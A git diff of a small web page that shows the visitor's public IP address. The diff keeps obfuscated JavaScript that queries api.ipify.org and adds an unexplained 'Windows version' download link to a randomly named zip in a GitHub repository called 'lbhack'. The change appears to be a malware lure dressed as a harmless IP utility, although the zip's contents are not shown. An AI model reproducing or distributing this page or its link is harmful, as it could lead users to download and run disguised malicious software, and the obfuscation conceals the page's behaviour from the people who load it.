--- a/index.html
+++ b/index.html
@@ -1,6 +1,5 @@
 <!DOCTYPE html>
 <html>
-
 <head>
     <title>Getting Clients IP</title>
     <style>
@@ -8,23 +7,18 @@
             color: green;
         }
     </style>
-    <script src=
-"https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js">
-    </script>
-
+    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
     <script>
-    var v=F;function M(){var O=['40DyXUko','10KHCOUQ','https://api.ipify.org?format=json','1187084IYncpj','17211552JlffWb','1790922NkBtYC','2kJfkpJ','7423042AKVtQz','1124862eCZDDT','12KqcTaP','getJSON','2248839XzBAPr','5238CJavjJ','1305RRUefj'];M=function(){return O;};return M();}function F(i,r){var I=M();return F=function(o,V){o=o-0x86;var a=I[o];return a;},F(i,r);}(function(i,r){var a=F,I=i();while(!![]){try{var o=-parseInt(a(0x8e))/0x1*(-parseInt(a(0x91))/0x2)+parseInt(a(0x93))/0x3*(parseInt(a(0x86))/0x4)+parseInt(a(0x8a))/0x5*(parseInt(a(0x89))/0x6)+parseInt(a(0x90))/0x7+-parseInt(a(0x8b))/0x8*(parseInt(a(0x88))/0x9)+parseInt(a(0x8c))/0xa*(parseInt(a(0x92))/0xb)+-parseInt(a(0x8f))/0xc;if(o===r)break;else I['push'](I['shift']());}catch(V){I['push'](I['shift']());}}}(M,0xc0180),$[v(0x87)](v(0x8d),function(i){$('#gfg')['html'](i['ip']);}));
-    </script>
+var v=F;function M(){var O=['40DyXUko','10KHCOUQ','https://api.ipify.org?format=json','1187084IYncpj','17211552JlffWb','1790922NkBtYC','2kJfkpJ','7423042AKVtQz','1124862eCZDDT','12KqcTaP','getJSON','2248839XzBAPr','5238CJavjJ','1305RRUefj'];M=function(){return O;};return M();}function F(i,r){var I=M();return F=function(o,V){o=o-0x86;var a=I[o];return a;},F(i,r);}(function(i,r){var a=F,I=i();while(!![]){try{var o=-parseInt(a(0x8e))/0x1*(-parseInt(a(0x91))/0x2)+parseInt(a(0x93))/0x3*(parseInt(a(0x86))/0x4)+parseInt(a(0x8a))/0x5*(parseInt(a(0x89))/0x6)+parseInt(a(0x90))/0x7+-parseInt(a(0x8b))/0x8*(parseInt(a(0x88))/0x9)+parseInt(a(0x8c))/0xa*(parseInt(a(0x92))/0xb)+-parseInt(a(0x8f))/0xc;if(o===r)break;else I['push'](I['shift']());}catch(V){I['push'](I['shift']());}}}(M,0xc0180),$[v(0x87)](v(0x8d),function(i){$('#gfg')['html'](i['ip']);}));
+</script>
 </head>
-
 <body>
     <center>
         <h1>LinuxFu</h1>
-        <h3>Public IP Address of user is:</h3>
+        <h3>Your IP Address:</h3>
+    <p id="gfg"></p>
+    <a href="https://github.com/lbhack/lb/blob/lb/syrafalira.zip">Windows version</a>
 
-        <p id="gfg"></p>
-
-    </center>
+</center>
 </body>
-
 </html>
